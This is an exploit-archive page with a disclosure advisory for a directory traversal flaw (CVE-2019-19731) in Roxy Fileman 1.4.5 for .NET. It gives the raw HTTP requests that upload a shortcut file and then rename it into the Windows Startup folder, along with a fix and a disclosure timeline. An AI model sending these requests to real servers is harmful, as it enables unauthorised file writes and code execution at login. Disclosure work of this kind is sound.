exploit the possibilities

Roxy Fileman 1.4.5 For .NET Directory Traversal

Roxy Fileman 1.4.5 For .NET Directory Traversal
Posted Dec 13, 2019
Authored by Patrik Lantz

Roxy Fileman version 1.4.5 for .NET suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2019-19731
MD5 | 8284d1688030466bc863d4e452dcf4ff

Roxy Fileman 1.4.5 For .NET Directory Traversal

Change Mirror Download

===========================
Exploit Title: Roxy Fileman 1.4.5 for .NET - Directory Traversal
Software: Roxy Fileman
Version: 1.4.5
Vendor Homepage: http://www.roxyfileman.com/
Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
CVE number: CVE-2019-19731
Found: 2019-12-06
Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134
(using custom account as application pool identity for the IIS worker process).
Author: Patrik Lantz

===========================
Description
===========================
Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on
the IIS worker process privileges.
This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution
of this file will be triggered on the next login.


Proof of Concept
===========================

It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include
the .lnk extension.

1) Create a shortcut file

By using for example the target executable C:\Windows\System32\Calc.exe
Remove the .lnk extension and rename it to use the .dat extension.


2) Upload the file

Either upload the .dat file manually via the Roxy Fileman web interface
or programmatically using a HTTP POST request.

Details of the request:

POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------159382831523528
Content-Length: 924
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

-----------------------------159382831523528
Content-Disposition: form-data; name="action"

upload
-----------------------------159382831523528
Content-Disposition: form-data; name="method"

ajax
-----------------------------159382831523528
Content-Disposition: form-data; name="d"

/wwwroot/fileman/Uploads/test2
-----------------------------159382831523528
Content-Disposition: form-data; name="files[]"; filename="poc.dat"
Content-Type: application/octet-stream

...data omitted...
-----------------------------159382831523528--



3) Write the file to the Startup folder using the RENAMEFILE action
The new filename is set via the n parameter. The correct path can be identified by trial and error depending
on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).

If the necessary directories do not exist, they can be created using the CREATEDIR action which also
is vulnerable to path traversal.


POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat



Workaround / Fix:
===========================

Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions:
CREATEDIR, COPYFILE and RENAMEFILE.

Recommendations for users of Roxy Fileman:
- Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.



Timeline
===========================
2019-12-06: Discovered the vulnerability
2019-12-06: Reported to the vendor (vendor is unresponsive)
2019-12-11: Request CVE
2019-12-13: Advisory published

Discovered By:
===========================
Patrik Lantz

Comments (1)

RSS Feed Subscribe to this comment feed
harryjames

Thanks for sharing information....corporateofficecontact.com

Comment by harryjames
2019-12-14 00:10:12 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    15 Files
  • 4
    Apr 4th
    5 Files
  • 5
    Apr 5th
    5 Files
  • 6
    Apr 6th
    27 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close